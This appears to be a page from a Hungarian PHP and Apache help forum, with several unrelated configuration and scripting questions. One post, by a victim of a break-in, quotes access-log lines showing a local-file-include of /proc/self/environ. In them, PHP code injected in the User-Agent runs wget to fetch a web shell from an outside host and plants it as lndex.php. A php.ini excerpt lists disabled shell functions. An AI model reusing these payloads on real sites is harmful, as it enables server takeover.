Internet: PHP, CGI, stb.

Lehetséges-e tértivevényes email küldése PHP-ből.
Mivel levelet a mail() függvénnyel lehet küldeni, gondolom azt kellene paraméterezni:

bool mail  ( string $to  , string $subject  , string $message  [, string $additional_headers  [, string $additional_parameters  ]] )

Valószínűsítem, hogy a két opcionális paraméter egyikében (inkább a másodikban) lehet valamilyen tértivevény kérő stringet beírni?
Tudom a mail felépítését kellene jobban ismernem!

Sziasztok !

Feltettem a PHP 5.2.5-öt az apache mellé úgy, hogy CGI-ként fusson, de az a gond, hogy 8másodpercet kell várni a php-s oldalaknál, hogy a php-cgi.exe elkezdje az oldal feldolgozását. ha modulként teszem be, akkor viszont alig 1másodperc kell, és be is töltötte az oldalt (ebből az következik, hogy nem maga az odalon levő kód a lassú).

Apache konfig (csak a fontosabbak):

LoadModule actions_module modules/mod_actions.so
LoadModule alias_module modules/mod_alias.so
LoadModule asis_module modules/mod_asis.so
LoadModule auth_basic_module modules/mod_auth_basic.so
LoadModule authn_default_module modules/mod_authn_default.so
LoadModule authn_file_module modules/mod_authn_file.so
LoadModule authz_default_module modules/mod_authz_default.so
LoadModule authz_groupfile_module modules/mod_authz_groupfile.so
LoadModule authz_host_module modules/mod_authz_host.so
LoadModule authz_user_module modules/mod_authz_user.so
LoadModule autoindex_module modules/mod_autoindex.so
LoadModule cache_module modules/mod_cache.so
LoadModule cgi_module modules/mod_cgi.so
LoadModule deflate_module modules/mod_deflate.so
LoadModule dir_module modules/mod_dir.so
LoadModule disk_cache_module modules/mod_disk_cache.so
LoadModule env_module modules/mod_env.so
LoadModule gzip_module modules/mod_gzip.so
LoadModule isapi_module modules/mod_isapi.so
LoadModule log_config_module modules/mod_log_config.so
LoadModule mime_module modules/mod_mime.so
LoadModule rewrite_module modules/mod_rewrite.so
LoadModule security2_module modules/mod_security2.so
LoadModule ssl_module modules/mod_ssl.so
LoadModule unique_id_module modules/mod_unique_id.so
LoadModule userdir_module modules/mod_userdir.so
LoadModule vhost_alias_module modules/mod_vhost_alias.so

<IfModule dir_module>
    DirectoryIndex index.php index.html
</IfModule>

<IfModule mime_module>
    TypesConfig conf/mime.types
    AddType application/x-compress .Z
    AddType application/x-gzip .gz .tgz
    AddType application/x-httpd-php .php
    AddType application/x-httpd-php-source .phps
</IfModule>

<Location />
    AddOutputFilterByType DEFLATE text/html text/plain text/css text/xml application/x-javascript application/x-httpd-php application/x-httpd-php-source
</Location>

<IfModule alias_module>
    ScriptAlias /php/ "C:/win32/usr/local/php/"
</IfModule>

<IfModule actions_module>
    Action application/x-httpd-php "/php/php-cgi.exe"
</IfModule>

<Directory "C:/win32/usr/local/php/">
    Options None
    AllowOverride None
    Order allow,deny
    Allow from all
</Directory>

Timeout 10
KeepAlive On
MaxKeepAliveRequests 500
MaxRequestsPerChild 1000

KeepAliveTimeout 5

SetEnv PHPRC "C:/win32/etc/apache2/php"

<IfModule mpm_prefork_module>
    StartServers    100
    MinSpareServers 65
    MaxSpareServers 100
    MaxClients  256
    ServerLimit 256
</IfModule>

PHP konfiguráció (csak a fontosabbak):

; Language Options
;;;;;;;;;;;;;;;;;;
engine = On
safe_mode = On
safe_mode_include_dir = "C:/win32/usr/share/php;C:/win32/usr/share/php"
disable_functions = dl exec ini_alter leak openlog passthru proc_close proc_open shell_exec system virtual ini_restore syslog disk_free_space disk_total_space diskfreespace phpinfo

disable_classes =
expose_php = Off
max_execution_time = 60
max_input_time = 75

memory_limit = 64M

; Paths and Directories
;;;;;;;;;;;;;;;;;;;;;;;
include_path="C:/win32/usr/share/pear;C:/win32/usr/share/php"
extension_dir = "C:/win32/usr/lib/php5"

; Dynamic Extensions
;;;;;;;;;;;;;;;;;;;;
extension=php_gd2.dll
extension=php_mbstring.dll
extension=php_mcrypt.dll
extension=php_suhosin.dll

extension=php_mysql.dll
extension=php_openssl.dll

A címben említett függvénnyel van egy kis gond. A szerveren van egy levélküldő form ami szépen elküldi a levelet, de a dátum mezőt nem tölti ki. Tehát a küldött email (no date) címkével érkezik.

Ami érdekes, hogy a fejlécben viszont ott a Date: mező és rendesen ki van töltve.

Apache 2.2.4 és PHP 5.2.3 verzió a szerveren és Safe mód bekapcsolva.

Előre is köszönöm a válaszokat.

Ui: A phpmailer-t néztem, de mivel ezek a pluginok már adottak ezért nem szeretném átvariálni ha nem muszáj :-)

Sziasztok, nemrégiben feltörték az oldalamat, és elkezdtem olvasgatni a log fájlokat.

Találtam pár számomra érdekes és lehet hogy másoknak is tanulságos bejegyzést:

87.109.129.170 - - [10/Jan/2008:14:43:00 -0700] "GET /examples/index.php?p=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 3373 "-" "jcfs<?system(\"wget http://www.darkmindz.com/shell/x2300.txt 2> /dev/stdout\");?>jcfs"

87.109.129.170 - - [10/Jan/2008:14:44:00 -0700] "GET /examples/index.php?p=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 3373 "-" "jcfs<?system(\"wget http://www.darkmindz.com/shell/x2300.txt 2> /dev/stdout\");?>jcfs"

87.109.129.170 - - [10/Jan/2008:14:45:00 -0700] "GET /examples/index.php?p=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 2920 "-" "jcfs<?system(\"cd /home/nagitaco/public_html/; wget http://www.darkmindz.com/shell/x2300.txt; mv x2300.txt lndex.php 2> /dev/stdout\");?>jcfs"

Az index.php include-olt egy másik php oldalt.
Ami érdekes: a saját gépről a proc/self/environ állományt el tudta érni, és ki tudta írtani a tartalmát.
Ami még érdekesebb: pontosan hogy és miért működik a kérés hátsó, jcfs-ek közötti része ?

A wget-et értem, de mi a jcfs? hogy tudta ezt a kérést a gépnek elküldeni?
telnet?
miért fogadta el a szerver, és hajtotta végre az utasításokat?
A kérdéses lndex.php állományt megtaláltam, tehát szerintem a betörés sikeres volt, legalábbis a log fájlok szerint és a könyvtárállományok szerint is megtaláltam a gépre feltett idegen php fájlt.

Kérem ha valaki a fenti sorok második részének (jcfs) pontos működését érti, írja meg.

Amit tettem:
GET-en kapott include-ból a / : ; karaktereket kapásból törlöm, limitált a paraméter hossza.
de lehet hogy ez így még mindig nem elég. Erre a fenti jcfs-t tartalmazó lekérésre nem számítottam, a betörés előtt csak a :// karaktersorozatot töröltem automatikusan a GET-ből, gondolván hogy így kívülről nem juthat be fájl. Hát bejutott.

A feltölteni próbált betörőkészletekből 6 különbözőt sikerült lementenem.

Ha valakit érdekel hogy a próbálkozók mit akarnak a gépre tenni (vagy tettek), itt egy szép gyűjtemény a logfájlomból és a publikus könyvtárakból kiszedett állományokról: http://pythonlib.pergamen.hu/betoroholmik.tar.gz php kódok vannak benne.

pár napig kinthagyom, aztán törlöm. Biztos ami biztos.

Köszönöm a segítséget.

Balázs

Hello!

Adott egy oldal, amiben van egy javascript függvény: fuggveny(). Ajaxos kérést használ, és a főoldalon belül gond nélkül lefut.

Egy iframe-t helyeztem el az oldalon belül, és ott szeretném használni ezt a függvényt: parent.fuggveny(). De sajnos, ekkor valamiért nem fut le. Ennél a pontnál ragad meg (vagyis eddig biztos eljut):
req.open("GET",oldal,false)

Mi lehet a gond?

köszi

Sziasztok!

Újra segítséget szeretnék tőletek kérni.

Egy nagyon egyszerű file uploader programról van szó, webformmal.

Azt szeretném elérni, hogy ha adott tipusu file feltöltésre kerül, akkor a listázó rendeljen hozzá egy általam meghatározott ikont. (Konkrétan .pdf ; .doc és video file-ok lesznek)

Erre sajnos nem találtam még megoldást, kérlek, ha van ötletetek, osszátok meg velem.

Köszönöm, üdv,

D

Php valamiért nem működik.
Fent van, parancssorban működik a "php -version". Apache modul is bent van elvileg (autoindex-nél kiírja), conf-ban is benne van.

De a szokásos test.php nem ad semmit, csak üres lapot.

Mi hiányozhat?

(előzmény: http://hup.hu/node/50403 )

Sziasztok!

Nekem a kérdésem inkább kicsit a szerver oldali részhez kapcsolodna.
Van egy weblapom, a saját szerveren van tárolva, én állítottam be a php.ini-t is.

A weblap : http://petofimusicalstudio.hu
Valamiért, és jelenleg még nemtudom az okát, nem tölt be a bal oldai menü.Az oldal szerkesztője azt mondta hogy, a nincs beállítva a get parancs a php.ini ben.
A gettxt a gnus eszköz fel van telepítve a php5-höz.

Ha tényleg a php beállítást rontottam el, akkor hol keressem a hiba megoldását?

Thx elöre is.

Sziasztok!

Egy olyan intranetes programba kellene külső látogatottságmérőt illesztenem, amely nem támogatja ezt. Az egyik lehetséges megoldásnak azt találtuk ki, hogy a kezelőfelületen egy részét PHP szkriptből jelenítjük meg, amely nem csinálna mást, mint elmentene bizonyos információkat, majd megjelenítené a képet. Viszont az adminisztrációs felületbe csak képeket enged "behekkelni", PHP kiterjesztésű állományokat nem.
A kérdésem az: meg lehet oldani valahogy apache+php alatt, hogy egy adott kép kiterjesztéssel rendelkező állományt (esetleg adott helyen található) a PHP interpreter dolgozzon fel, azon kívül, hogy csinálok egy "AddType image/png .png" az apache php5.conf állományába? Ez ugyan működni látszik, viszont természetesen a többi kép megjelenítése is "megbolondul".

Sziasztok!

Nekem egy olyan php script kellene, ami a weboldal latogatomnak megjelenit egy pl. reklamablakot, de ha ujra meglatogatja , mar ne jelenjen meg neki. Hogyan lehetne megoldni?